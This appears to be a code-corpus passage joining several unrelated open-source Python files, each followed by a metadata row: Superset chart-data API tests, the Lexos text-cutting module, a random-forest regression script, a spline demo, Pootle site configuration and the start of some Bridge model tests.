Chart data API: Test chart data with unsupported result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_format"] = "qwerty"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_query_result_type(self):
"""
Chart data API: Test chart data with query result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.QUERY
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
def test_chart_data_csv_result_format(self):
"""
Chart data API: Test chart data with CSV result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_format"] = "csv"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
def test_chart_data_mixed_case_filter_op(self):
"""
Chart data API: Ensure mixed case filter operator generates valid result
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"][0]["op"] = "In"
request_payload["queries"][0]["row_limit"] = 10
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 10)
def test_chart_data_prophet(self):
"""
Chart data API: Ensure prophet post transformation works
"""
pytest.importorskip("fbprophet")
self.login(username="admin")
request_payload = get_query_context("birth_names")
time_grain = "P1Y"
request_payload["queries"][0]["is_timeseries"] = True
request_payload["queries"][0]["groupby"] = []
request_payload["queries"][0]["extras"] = {"time_grain_sqla": time_grain}
request_payload["queries"][0]["granularity"] = "ds"
request_payload["queries"][0]["post_processing"] = [
{
"operation": "prophet",
"options": {
"time_grain": time_grain,
"periods": 3,
"confidence_interval": 0.9,
},
}
]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
row = result["data"][0]
self.assertIn("__timestamp", row)
self.assertIn("sum__num", row)
self.assertIn("sum__num__yhat", row)
self.assertIn("sum__num__yhat_upper", row)
self.assertIn("sum__num__yhat_lower", row)
self.assertEqual(result["rowcount"], 47)
def test_chart_data_query_missing_filter(self):
"""
Chart data API: Ensure filter referencing missing column is ignored
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = [
{"col": "non_existent_filter", "op": "==", "val": "foo"},
]
request_payload["result_type"] = utils.ChartDataResultType.QUERY
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
assert "non_existent_filter" not in response_payload["result"][0]["query"]
def test_chart_data_no_data(self):
"""
Chart data API: Test chart data with empty result
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = [
{"col": "gender", "op": "==", "val": "foo"}
]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 0)
self.assertEqual(result["data"], [])
def test_chart_data_incorrect_request(self):
"""
Chart data API: Test chart data with invalid SQL
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = []
# erroneus WHERE-clause
request_payload["queries"][0]["extras"]["where"] = "(gender abc def)"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_with_invalid_datasource(self):
"""
Chart data API: Test chart data query with invalid schema
"""
self.login(username="admin")
payload = get_query_context("birth_names")
payload["datasource"] = "abc"
rv = self.post_assert_metric(CHART_DATA_URI, payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_with_invalid_enum_value(self):
"""
Chart data API: Test chart data query with invalid enum value
"""
self.login(username="admin")
payload = get_query_context("birth_names")
payload["queries"][0]["extras"]["time_range_endpoints"] = [
"abc",
"EXCLUSIVE",
]
rv = self.client.post(CHART_DATA_URI, json=payload)
self.assertEqual(rv.status_code, 400)
def test_query_exec_not_allowed(self):
"""
Chart data API: Test chart data query not allowed
"""
self.login(username="gamma")
payload = get_query_context("birth_names")
rv = self.post_assert_metric(CHART_DATA_URI, payload, "data")
self.assertEqual(rv.status_code, 401)
def test_chart_data_jinja_filter_request(self):
"""
Chart data API: Ensure request referencing filters via jinja renders a correct query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.QUERY
request_payload["queries"][0]["filters"] = [
{"col": "gender", "op": "==", "val": "boy"}
]
request_payload["queries"][0]["extras"][
"where"
] = "('boy' = '{{ filter_values('gender', 'xyz' )[0] }}')"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]["query"]
if get_example_database().backend != "presto":
assert "('boy' = 'boy')" in result
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async(self):
"""
Chart data API: Test chart data query (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 202)
data = json.loads(rv.data.decode("utf-8"))
keys = list(data.keys())
self.assertCountEqual(
keys, ["channel_id", "job_id", "user_id", "status", "errors", "result_url"]
)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async_results_type(self):
"""
Chart data API: Test chart data query non-JSON format (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = "results"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async_invalid_token(self):
"""
Chart data API: Test chart data query (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
test_client.set_cookie(
"localhost", app.config["GLOBAL_ASYNC_QUERIES_JWT_COOKIE_NAME"], "foo"
)
rv = post_assert_metric(test_client, CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 401)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request
"""
async_query_manager.init_app(app)
self.login(username="admin")
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
orig_run = ChartDataCommand.run
def mock_run(self, **kwargs):
assert kwargs["force_cached"] == True
# override force_cached to get result from DB
return orig_run(self, force_cached=False)
with mock.patch.object(ChartDataCommand, "run", new=mock_run):
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
self.assertEqual(data["result"][0]["rowcount"], 45)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache_run_failed(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request with run failure
"""
async_query_manager.init_app(app)
self.login(username="admin")
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
self.assertEqual(data["message"], "Error loading data from cache")
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache_no_login(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request (no login)
"""
async_query_manager.init_app(app)
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
orig_run = ChartDataCommand.run
def mock_run(self, **kwargs):
assert kwargs["force_cached"] == True
# override force_cached to get result from DB
return orig_run(self, force_cached=False)
with mock.patch.object(ChartDataCommand, "run", new=mock_run):
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
self.assertEqual(rv.status_code, 401)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_cache_key_error(self):
"""
Chart data cache API: Test chart data async cache request with invalid cache key
"""
async_query_manager.init_app(app)
self.login(username="admin")
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
self.assertEqual(rv.status_code, 404)
def test_export_chart(self):
"""
Chart API: Test export chart
"""
example_chart = db.session.query(Slice).all()[0]
argument = [example_chart.id]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
buf = BytesIO(rv.data)
assert is_zipfile(buf)
def test_export_chart_not_found(self):
"""
Chart API: Test export chart not found
"""
# Just one does not exist and we get 404
argument = [-1, 1]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
def test_export_chart_gamma(self):
"""
Chart API: Test export chart has gamma
"""
example_chart = db.session.query(Slice).all()[0]
argument = [example_chart.id]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
assert rv.status_code == 404
def test_import_chart(self):
"""
Chart API: Test import chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
assert database.database_name == "imported_database"
assert len(database.tables) == 1
dataset = database.tables[0]
assert dataset.table_name == "imported_dataset"
assert str(dataset.uuid) == dataset_config["uuid"]
chart = db.session.query(Slice).filter_by(uuid=chart_config["uuid"]).one()
assert chart.table == dataset
db.session.delete(chart)
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_chart_overwrite(self):
"""
Chart API: Test import existing chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# import again without overwrite flag
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"message": {
"charts/imported_chart.yaml": "Chart already exists and `overwrite=true` was not passed",
}
}
# import with overwrite flag
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
"overwrite": "true",
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# clean up
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
dataset = database.tables[0]
chart = db.session.query(Slice).filter_by(uuid=chart_config["uuid"]).one()
db.session.delete(chart)
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_chart_invalid(self):
"""
Chart API: Test import invalid chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("chart_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_metadata_config).encode())
with bundle.open(
"chart_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open("chart_export/datasets/imported_dataset.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
with bundle.open("chart_export/charts/imported_chart.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"message": {"metadata.yaml": {"type": ["Must be equal to Slice."]}}
}
@pytest.mark.usefixtures("create_annotation_layers")
def test_chart_data_annotations(self):
"""
Chart data API: Test chart data query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
annotation_layers = []
request_payload["queries"][0]["annotation_layers"] = annotation_layers
# formula
annotation_layers.append(ANNOTATION_LAYERS[AnnotationType.FORMULA])
# interval
interval_layer = (
db.session.query(AnnotationLayer)
.filter(AnnotationLayer.name == "name1")
.one()
)
interval = ANNOTATION_LAYERS[AnnotationType.INTERVAL]
interval["value"] = interval_layer.id
annotation_layers.append(interval)
# event
event_layer = (
db.session.query(AnnotationLayer)
.filter(AnnotationLayer.name == "name2")
.one()
)
event = ANNOTATION_LAYERS[AnnotationType.EVENT]
event["value"] = event_layer.id
annotation_layers.append(event)
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
# response should only contain interval and event data, not formula
self.assertEqual(len(data["result"][0]["annotation_data"]), 2)
| apache-2.0 | 4,903,939,264,980,543,000 | 36.844242 | 105 | 0.577983 | false |
TheLady/Lexos | processors/prepare/cutter.py | 1 | 14378 | import re
from Queue import Queue
from math import ceil
from types import *
WHITESPACE = ['\n', '\t', ' ', '', u'\u3000']
# from helpers.constants import WHITESPACE
def splitKeepWhitespace(string):
"""
Splits the string on whitespace, while keeping the tokens on which the string was split.
Args:
string: The string to split.
Returns:
The split string with the whitespace kept.
"""
return re.split(u'(\u3000|\n| |\t)', string)
# Note: Regex in capture group keeps the delimiter in the resultant list
def countWords(textList): # Ignores WHITESPACE as being 'not words'
"""
Counts the "words" in a list of tokens, where words are anything not in the WHITESPACE global.
Args:
textList: A list of tokens in the text.
Returns:
The number of words in the list.
"""
return len([x for x in textList if x not in WHITESPACE])
def stripLeadingWhiteSpace(q):
"""
Takes in the queue representation of the text and strips the leading whitespace.
Args:
q: The text in a Queue object.
Returns:
None
"""
if not q.empty():
while q.queue[0] in WHITESPACE:
trash = q.get()
if q.empty():
break
def stripLeadingBlankLines(q):
"""
Takes in the queue representation of the text and strips the leading blank lines.
Args:
q: The text in a Queue object.
Returns:
None
"""
while q.queue == '':
trash = q.get()
if q.empty():
break
def stripLeadingCharacters(charQueue, numChars):
"""
Takes in the queue representation of the text and strips the leading numChars characters.
Args:
charQueue: The text in a Queue object.
numChars: The number of characters to remove.
Returns:
None
"""
for i in xrange(numChars):
removedChar = charQueue.get()
def stripLeadingWords(wordQueue, numWords):
"""
Takes in the queue representation of the text and strips the leading numWords words.
Args:
wordQueue: The text in a Queue object.
numWords: The number of words to remove.
Returns:
None
"""
for i in xrange(numWords):
stripLeadingWhiteSpace(wordQueue)
removedWord = wordQueue.get()
stripLeadingWhiteSpace(wordQueue)
def stripLeadingLines(lineQueue, numLines):
"""
Takes in the queue representation of the text and strips the leading numLines lines.
Args:
lineQueue: The text in a Queue object.
numLines: The number of lines to remove.
Returns:
None
"""
for i in xrange(numLines):
stripLeadingBlankLines(lineQueue)
removedLine = lineQueue.get()
stripLeadingBlankLines(lineQueue)
def cutByCharacters(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of characters,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in characters.
overlap: The number of characters to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
for token in text:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingCharacters(charQueue=chunkSoFar, numChars=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue)
if (float(len(lastChunk)) / chunkSize) < lastProp:
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByWords(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of words,
with an option for an amount of overlap between chunks and a minim
um proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in words.
overlap: The number of words to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = splitKeepWhitespace(text)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingWords(wordQueue=chunkSoFar, numWords=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByLines(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of lines,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in lines.
overlap: The number of lines to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = text.splitlines(True)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token == '':
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingLines(lineQueue=chunkSoFar, numLines=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByNumber(text, numChunks):
"""
Cuts the text into equally sized chunks, where the size of the chunk is determined by the number of desired chunks.
Args:
text: The string with the contents of the file.
numChunks: The number of chunks to cut the text into.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
splitText = splitKeepWhitespace(text)
textLength = countWords(splitText)
chunkSizes = []
for i in xrange(numChunks):
chunkSizes.append(textLength / numChunks)
for i in xrange(textLength % numChunks):
chunkSizes[i] += 1
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
chunkIndex = 0
chunkSize = chunkSizes[chunkIndex]
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
chunkSoFar.queue.clear()
currChunkSize = 1
chunkSoFar.put(token)
chunkIndex += 1
chunkSize = chunkSizes[chunkIndex]
else:
chunkSoFar.put(token)
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
stringList = [''.join(subList) for subList in chunkList]
return stringList
def cutByMilestone(text, cuttingValue):
"""
Cuts the file into as many chunks as there are instances of the
substring cuttingValue. Chunk boundaries are made wherever
the string appears.
Args: text -- the text to be chunked as a single string
Returns: A list of strings which are to become the new chunks.
"""
chunkList = [] #container for chunks
lenMS = len(cuttingValue) #length of milestone term
cuttingValue = cuttingValue.encode('utf-8')
if len(cuttingValue) > 0:
chunkstop = text.find(cuttingValue) #first boundary
print len(cuttingValue)
while chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
while chunkstop >= 0: #while next boundary != -1 (while next boundary exists)
print chunkstop
nextchunk = text[:chunkstop-1] #new chunk = current text up to boundary index
text = text[chunkstop+lenMS:] #text = text left after the boundary
chunkstop = text.find(cuttingValue) #first boundary
while chunkstop == 0:
if chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
chunkList.append(nextchunk) #append this chunk to chunk list
if len(text) > 0 :
chunkList.append(text)
else:
chunkList.append(text)
return chunkList
def cut(text, cuttingValue, cuttingType, overlap, lastProp):
"""
Cuts each text string into various segments according to the options chosen by the user.
Args:
text: A string with the text to be split
cuttingValue: The value by which to cut the texts by.
cuttingType: A string representing which cutting method to use.
overlap: A unicode string representing the number of words to be overlapped between each text segment.
lastProp: A unicode string representing the minimum proportion percentage the last chunk has to be to not get assimilated by the previous.
Returns:
A list of strings, each representing a chunk of the original.
"""
cuttingType = str(cuttingType)
if cuttingType != 'milestone' :
cuttingValue = int(cuttingValue)
overlap = int(overlap)
lastProp = float(lastProp.strip('%')) / 100
if cuttingType == 'letters':
stringList = cutByCharacters(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'words':
stringList = cutByWords(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'lines':
stringList = cutByLines(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'milestone':
stringList = cutByMilestone(text, cuttingValue)
else:
stringList = cutByNumber(text, cuttingValue)
return stringList | mit | 5,435,624,853,086,091,000 | 31.90389 | 146 | 0.648839 | false |
drabastomek/practicalDataAnalysisCookbook | Codes/Chapter06/regression_randomForest.py | 1 | 2303 | # this is needed to load helper from the parent folder
import sys
sys.path.append('..')
# the rest of the imports
import helper as hlp
import pandas as pd
import numpy as np
import sklearn.ensemble as en
import sklearn.cross_validation as cv
@hlp.timeit
def regression_rf(x,y):
'''
Estimate a random forest regressor
'''
# create the regressor object
random_forest = en.RandomForestRegressor(
min_samples_split=80, random_state=666,
max_depth=5, n_estimators=10)
# estimate the model
random_forest.fit(x,y)
# return the object
return random_forest
# the file name of the dataset
r_filename = '../../Data/Chapter06/power_plant_dataset_pc.csv'
# read the data
csv_read = pd.read_csv(r_filename)
# select the names of columns
dependent = csv_read.columns[-1]
independent_reduced = [
col
for col
in csv_read.columns
if col.startswith('p')
]
independent = [
col
for col
in csv_read.columns
if col not in independent_reduced
and col not in dependent
]
# split into independent and dependent features
x = csv_read[independent]
y = csv_read[dependent]
# estimate the model using all variables (without PC)
regressor = regression_rf(x,y)
# print out the results
print('R: ', regressor.score(x,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor, x, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x.columns, regressor.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
# estimate the model using only the most important feature
features = np.nonzero(regressor.feature_importances_ > 0.001)
x_red = csv_read[features[0]]
regressor_red = regression_rf(x_red,y)
# print out the results
print('R: ', regressor_red.score(x_red,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor_red, x_red, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x_red.columns, regressor_red.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label)) | gpl-2.0 | 5,688,512,074,880,824,000 | 24.318681 | 62 | 0.671298 | false |
airekans/Snippet | python/numpy_scipy_learning/spline.py | 1 | 1310 | import numpy as np
import scipy as sp
from scipy.interpolate import UnivariateSpline
import matplotlib.pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7]
y = [1, 4, 9, 16, 26, 30, 51]
# Test Spline
trajectory = np.array([x, y], dtype=float)
print trajectory
plt.plot(trajectory[0], trajectory[1])
plt.show()
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1])
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
print smoothTrajectory
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 2
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=1)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 3
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=2)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
| unlicense | -259,108,058,511,957,630 | 21.20339 | 70 | 0.726718 | false |
arky/pootle-dev | pootle/apps/pootle_misc/siteconfig.py | 1 | 1832 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2004-2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
"""
NOTE: Import this file in your urls.py or some place before any code relying on
settings is imported.
"""
from django.contrib.sites.models import Site
from djblets.siteconfig.django_settings import (apply_django_settings,
generate_defaults)
from djblets.siteconfig.models import SiteConfiguration
SETTINGS_MAP = {
# siteconfig key settings.py key
'DESCRIPTION': 'DESCRIPTION',
'TITLE': 'TITLE',
}
def load_site_config():
"""Set up the SiteConfiguration, provide defaults and sync settings."""
try:
siteconfig = SiteConfiguration.objects.get_current()
except SiteConfiguration.DoesNotExist:
# Either warn or just create the thing. Depends on your app.
siteconfig = SiteConfiguration(site=Site.objects.get_current(),
version="1.0")
siteconfig.save()
if not siteconfig.get_defaults():
siteconfig.add_defaults(generate_defaults(SETTINGS_MAP))
apply_django_settings(siteconfig, SETTINGS_MAP)
return siteconfig
| gpl-2.0 | -3,864,998,015,168,332,000 | 33.566038 | 79 | 0.696507 | false |
uw-it-aca/uw-restclients | restclients/test/bridge/models.py | 1 | 5687 | from datetime import datetime
from django.test import TestCase
from django.utils.dateparse import parse_datetime
from restclients.exceptions import DataFailureException
from restclients.models.bridge import BridgeUser, BridgeCustomField,\
BridgeUserRole
from restclients.test import fdao_pws_override
class TestBridgeModel(TestCase):
def test_bridge_user_role(self):
role = BridgeUserRole(role_id='user', name='user')
self.assertEqual(role.to_json(),
{"id": "user", "name": "user"})
def test_bridge_custom_field(self):
bcf = BridgeCustomField(value_id="1",
field_id="5",
name="Regid",
value="787")
self.assertEqual(bcf.to_json(),
{'id': '1',
'value': '787',
'custom_field_id': '5'})
self.assertTrue(bcf.is_regid())
self.assertEqual(bcf.value, '787')
bcf = BridgeCustomField(field_id="5",
name="REGID")
self.assertEqual(bcf.to_json(),
{'custom_field_id': '5',
